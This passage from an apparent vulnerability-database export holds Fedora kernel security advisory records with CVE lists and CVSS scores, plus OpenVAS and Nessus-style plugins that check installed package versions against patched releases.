reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-zeroconf-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-utils\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-utils-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse 
audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "cvss3": {}, "published": "2009-08-05T00:35:52", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: kernel-2.6.29.6-217.2.3.fc11", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1895", "CVE-2009-1897", "CVE-2009-2406", "CVE-2009-2407"], "modified": "2009-08-05T00:35:52", "id": "FEDORA:3462710F8B9", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/DTUSA3L3RWF5CKQRSUPU4HGHFNWWUIO6/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. 
", "cvss3": {}, "published": "2009-08-15T21:45:53", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: kernel-2.6.29.6-217.2.7.fc11", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1895", "CVE-2009-1897", "CVE-2009-2406", "CVE-2009-2407", "CVE-2009-2692"], "modified": "2009-08-15T21:45:53", "id": "FEDORA:7B88D10F857", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/GLV55DRGD7NIZMO6KJQWG5Z2QD7L472G/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. 
", "cvss3": {}, "published": "2009-08-17T22:00:48", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: kernel-2.6.29.6-217.2.8.fc11", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1895", "CVE-2009-1897", "CVE-2009-2406", "CVE-2009-2407", "CVE-2009-2692", "CVE-2009-2767"], "modified": "2009-08-17T22:00:48", "id": "FEDORA:43A4210F8C3", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/MSD6F5KGVWME2BOBFNQP525FTNYYH6EC/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. 
", "cvss3": {}, "published": "2009-08-05T00:30:27", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: kernel-2.6.27.29-170.2.78.fc10", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5079", "CVE-2009-0065", "CVE-2009-1895", "CVE-2009-1897", "CVE-2009-2406", "CVE-2009-2407"], "modified": "2009-08-05T00:30:27", "id": "FEDORA:91FDD10F8A2", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/QTXEWTOSJ3Y767PPNY3FBWJI6BQYWWW3/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. 
", "cvss3": {}, "published": "2009-08-15T21:45:33", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: kernel-2.6.27.29-170.2.79.fc10", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5079", "CVE-2009-0065", "CVE-2009-1895", "CVE-2009-1897", "CVE-2009-2406", "CVE-2009-2407", "CVE-2009-2692"], "modified": "2009-08-15T21:45:33", "id": "FEDORA:5B2C610F862", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/MAQQYLT4QWLTVGYYPTC2TUL3FWMGFT6V/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. 
", "cvss3": {}, "published": "2009-08-27T02:19:22", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: kernel-2.6.29.6-217.2.16.fc11", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1895", "CVE-2009-1897", "CVE-2009-2406", "CVE-2009-2407", "CVE-2009-2691", "CVE-2009-2692", "CVE-2009-2695", "CVE-2009-2767", "CVE-2009-2847", "CVE-2009-2848", "CVE-2009-2849"], "modified": "2009-08-27T02:19:22", "id": "FEDORA:921C610F878", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/DPPW4MDQO74VWNGBP5Z3DR6V3V2WA35P/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. 
", "cvss3": {}, "published": "2009-10-03T18:56:05", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: kernel-2.6.27.35-170.2.94.fc10", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5079", "CVE-2009-0065", "CVE-2009-1895", "CVE-2009-1897", "CVE-2009-2406", "CVE-2009-2407", "CVE-2009-2692", "CVE-2009-2847", "CVE-2009-2903", "CVE-2009-3001", "CVE-2009-3002", "CVE-2009-3290"], "modified": "2009-10-03T18:56:05", "id": "FEDORA:2CF2010F7EA", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/AIU4FYCISH7YP6ZRGW5APZ4RJQAPH4P6/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. 
", "cvss3": {}, "published": "2009-10-15T22:37:20", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: kernel-2.6.27.37-170.2.104.fc10", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5079", "CVE-2009-0065", "CVE-2009-1895", "CVE-2009-1897", "CVE-2009-2406", "CVE-2009-2407", "CVE-2009-2692", "CVE-2009-2847", "CVE-2009-2903", "CVE-2009-2908", "CVE-2009-2909", "CVE-2009-2910", "CVE-2009-3290"], "modified": "2009-10-15T22:37:20", "id": "FEDORA:C80E110F85F", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/76PC66MBDWWM3HWZ5XTOP32ZACNOKBDI/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. 
", "cvss3": {}, "published": "2009-11-06T00:05:15", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: kernel-2.6.27.38-170.2.113.fc10", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5079", "CVE-2009-0065", "CVE-2009-1895", "CVE-2009-1897", "CVE-2009-2406", "CVE-2009-2407", "CVE-2009-2692", "CVE-2009-2847", "CVE-2009-2903", "CVE-2009-3290", "CVE-2009-3547", "CVE-2009-3612", "CVE-2009-3620", "CVE-2009-3621", "CVE-2009-3638"], "modified": "2009-11-06T00:05:15", "id": "FEDORA:F394810F8A0", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/R2OASDOPR5TXTMMAQM2WQ4FUYYEZFDVY/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. 
", "cvss3": {}, "published": "2009-12-11T18:26:18", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: kernel-2.6.27.41-170.2.117.fc10", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5079", "CVE-2009-0065", "CVE-2009-1895", "CVE-2009-1897", "CVE-2009-2406", "CVE-2009-2407", "CVE-2009-2692", "CVE-2009-2847", "CVE-2009-2903", "CVE-2009-3080", "CVE-2009-3290", "CVE-2009-3547", "CVE-2009-3612", "CVE-2009-3620", "CVE-2009-3621", "CVE-2009-3638", "CVE-2009-4005", "CVE-2009-4031"], "modified": "2009-12-11T18:26:18", "id": "FEDORA:52EFE10F85C", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/VKCD2YRIM5ILQXE36S6T7O2IOBF5WLXL/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-25T10:56:49", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8144.", "cvss3": {}, "published": "2009-08-17T00:00:00", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-8144 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-1897"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:64553", "href": "http://plugins.openvas.org/nasl.php?oid=64553", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8144.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8144 (kernel)\n#\n# Authors:\n# Thomas Reinke 
<reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\nLinux operating system. 
The kernel handles the basic functions\nof the operating system: memory allocation, process allocation, device\ninput and output, etc.\n\nUpdate Information:\n\nFix security bugs: CVE-2009-1895 CVE-2009-2406 CVE-2009-2407\n\nChangeLog:\n\n* Wed Jul 29 2009 Chuck Ebbert 2.6.29.6-217.2.3\n- Don't optimize away NULL pointer tests where pointer is used before the test.\n(CVE-2009-1897)\n* Wed Jul 29 2009 Chuck Ebbert 2.6.29.6-217.2.2\n- Fix mmap_min_addr security bugs (CVE-2009-1895)\n* Wed Jul 29 2009 Chuck Ebbert 2.6.29.6-217.2.1\n- Fix eCryptfs overflow issues (CVE-2009-2406, CVE-2009-2407)\n* Thu Jul 23 2009 Kyle McMartin 2.6.29.6-217\n- Apply three patches requested by sgruszka@redhat.com:\n- iwl3945-release-resources-before-shutting-down.patch\n- iwl3945-add-debugging-for-wrong-command-queue.patch\n- iwl3945-fix-rfkill-sw-and-hw-mishmash.patch\n* Thu Jul 23 2009 Jarod Wilson \n- virtio_blk: don't bounce highmem requests, works around a frequent\noops in kvm guests using virtio block devices (#510304)\n* Wed Jul 22 2009 Tom spot Callaway \n- We have to override the new %install behavior because, well... the kernel is\nspecial.\n* Wed Jul 22 2009 Ben Skeggs \n- drm-nouveau.patch: Fix DPMS off for DAC outputs, NV4x PFIFO typo\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. 
Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8144\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8144.\";\n\n\n\nif(description)\n{\n script_id(64553);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-08-17 16:54:45 +0200 (Mon, 17 Aug 2009)\");\n script_cve_id(\"CVE-2009-1895\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-1897\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-8144 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=511171\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=512861\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=512885\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif 
((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:31", "description": 
"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8144.", "cvss3": {}, "published": "2009-08-17T00:00:00", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-8144 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-1897"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064553", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064553", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8144.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8144 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\nLinux operating system. 
The kernel handles the basic functions\nof the operating system: memory allocation, process allocation, device\ninput and output, etc.\n\nUpdate Information:\n\nFix security bugs: CVE-2009-1895 CVE-2009-2406 CVE-2009-2407\n\nChangeLog:\n\n* Wed Jul 29 2009 Chuck Ebbert 2.6.29.6-217.2.3\n- Don't optimize away NULL pointer tests where pointer is used before the test.\n(CVE-2009-1897)\n* Wed Jul 29 2009 Chuck Ebbert 2.6.29.6-217.2.2\n- Fix mmap_min_addr security bugs (CVE-2009-1895)\n* Wed Jul 29 2009 Chuck Ebbert 2.6.29.6-217.2.1\n- Fix eCryptfs overflow issues (CVE-2009-2406, CVE-2009-2407)\n* Thu Jul 23 2009 Kyle McMartin 2.6.29.6-217\n- Apply three patches requested by sgruszka@redhat.com:\n- iwl3945-release-resources-before-shutting-down.patch\n- iwl3945-add-debugging-for-wrong-command-queue.patch\n- iwl3945-fix-rfkill-sw-and-hw-mishmash.patch\n* Thu Jul 23 2009 Jarod Wilson \n- virtio_blk: don't bounce highmem requests, works around a frequent\noops in kvm guests using virtio block devices (#510304)\n* Wed Jul 22 2009 Tom spot Callaway \n- We have to override the new %install behavior because, well... the kernel is\nspecial.\n* Wed Jul 22 2009 Ben Skeggs \n- drm-nouveau.patch: Fix DPMS off for DAC outputs, NV4x PFIFO typo\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. 
Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8144\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8144.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64553\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-08-17 16:54:45 +0200 (Mon, 17 Aug 2009)\");\n script_cve_id(\"CVE-2009-1895\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-1897\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-8144 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=511171\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=512861\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=512885\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.29.6~217.2.3.fc11\", 